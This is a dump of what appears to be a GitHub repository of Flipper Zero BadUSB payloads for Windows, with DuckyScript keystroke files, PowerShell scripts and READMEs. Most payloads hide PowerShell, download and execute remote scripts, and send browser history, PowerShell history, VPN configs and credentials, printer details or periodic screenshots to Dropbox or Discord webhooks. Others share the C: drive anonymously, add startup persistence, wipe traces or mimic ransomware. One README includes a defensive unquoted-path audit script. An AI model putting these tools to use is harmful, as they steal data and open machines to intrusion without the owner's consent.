================================================ FILE: FlipperZero/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: FlipperZero/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files 
looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/OVPN-Hog/readme.md ================================================

# OVPN-Hog

A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).

## Description

This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Powershell-History/README.md ================================================

# Powershell-History

A payload to exfiltrate the history of the powershell console

## Description

This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin 
Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: FlipperZero/payloads/Printer-Recon/README.md ================================================

# Printer-Recon

## Description

This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. Can also be used to find printer web interfaces on the network

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Priv-Paths/README.md ================================================

# Printer-Recon

## Description

A payload to enumerate unquoted service paths for privilege escalation and send to a discord webhook.

## Getting Started

### Dependencies

* Discord Webhook or other service that uses webhooks
* Windows 10

### Executing program

* Plug in your device
* Command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc

```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```

## Contributing

All contributors names will be listed here

atomiczsec

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
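An added audit example (not code from this repository): a defender can run the unquoted-path check described above against their own service inventory and get the corrected, quoted value for each finding. It assumes a CSV export with `Name`, `PathName` and `StartMode` columns; the sample rows and all function names are constructed.

```python
"""Added example: audit a service inventory for unquoted image paths.

Unlike the findstr filter in the README, this parses each PathName, so a
quoted argument does not hide a row and an unquoted path without spaces is
not reported. All start modes are checked, not only Auto.
"""
import csv
import io
import re

# Assumption: service images end in .exe; kernel drivers are out of scope.
EXE_END = re.compile(r"\.exe(?=\s|$)", re.I)


def split_image_path(pathname):
    """Split a service PathName into (executable, arguments, was_quoted).

    Returns None when no .exe image can be located (for example an empty value).
    """
    p = pathname.strip()
    quoted = re.match(r'"([^"]+)"\s*(.*)$', p)
    if quoted:
        return quoted.group(1), quoted.group(2), True
    end = EXE_END.search(p)
    if end is None:
        return None
    return p[: end.end()], p[end.end():].strip(), False


def audit(csv_text):
    """Return one finding per service whose unquoted image path has a space."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        parsed = split_image_path(row["PathName"])
        if parsed is None:
            continue
        exe, args, was_quoted = parsed
        if was_quoted or " " not in exe:
            continue
        findings.append({
            "name": row["Name"],
            "start_mode": row["StartMode"],
            "image": exe,
            # Remediation: the same command line with the image path quoted.
            "fixed": f'"{exe}" {args}'.rstrip(),
        })
    return findings


# Constructed inventory (not taken from a real host). CSV doubles inner quotes.
SAMPLE_CSV = r'''
"Name","PathName","StartMode"
"VendorUpdater","C:\Program Files\Vendor App\updater.exe -service","Auto"
"Spooler","C:\Windows\System32\spoolsv.exe","Auto"
"GoodSvc","""C:\Program Files\Good\good.exe"" --run","Auto"
"ArgQuoted","C:\Tools\agent.exe --config ""C:\Program Files\Agent\a.conf""","Manual"
"LegacySvc","C:\Program Files (x86)\Legacy Tool\bin\svc.exe","Manual"
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE_CSV):
        print(f'{finding["name"]} ({finding["start_mode"]}): {finding["fixed"]}')
```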

================================================ FILE: FlipperZero/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: FlipperZero/payloads/Proton-Hog/README.md ================================================

# Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.

## Description

This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file

Then dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. 
" } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: FlipperZero/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive

A payload to share the victim's "C:" drive to the network.

## Description

This payload will share the victim's entire "C:" drive to the entire network for further exploitation.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: FlipperZero/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare

A payload to prank your friends into thinking their computer got hit with ransomware.

## Description

This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable).

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter 
(Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: FlipperZero/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: FlipperZero/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock

This payload is meant to exfiltrate screenshots of all monitors and send them to a Dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

## Description

This payload uses iwr to download 2 files:

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup.

**c.ps1** will sit in the AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds.

The contents will then be sent to the DropBox for viewing pleasure.

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: FlipperZero/payloads/Screen-Shock/payload.txt 
================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: FlipperZero/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy

This payload is meant to exfiltrate Spotify usernames on the device. Some people are too afraid to ask for their Spotify or playlist, so here is a sneaky way to do so.

## Description

Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. 
REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark

A payload to get rid of the ugly Windows activation watermark.

## Description

This script will get rid of the ugly Windows watermark. This script will automatically reboot the device. This is not activating your computer!!

## Getting Started

### Dependencies

* Unactivated Windows 10

### Executing program

* Plug in your device

```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: FlipperZero/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Description

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
